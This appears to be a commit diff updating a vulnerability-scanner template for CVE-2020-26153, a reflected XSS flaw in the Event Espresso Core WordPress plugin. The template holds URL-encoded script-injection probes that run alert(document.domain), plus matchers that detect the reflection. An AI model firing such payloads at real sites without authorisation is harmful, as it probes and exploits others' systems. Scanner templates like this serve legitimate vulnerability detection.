Update CVE-2020-26153.yaml
parent
d561a8711d
commit
cdb91d44f3
|
@ -6,19 +6,21 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-26153
|
||||
tags: cve,cve2020,xss,event-espresso-core-reg,wordpress
|
||||
reference: |
|
||||
- https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26153
|
||||
tags: cve,cve2020,xss,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Cb"
|
||||
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"/><script>alert(document.domain);</script>'
|
||||
- '"/></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
Loading…
Reference in New Issue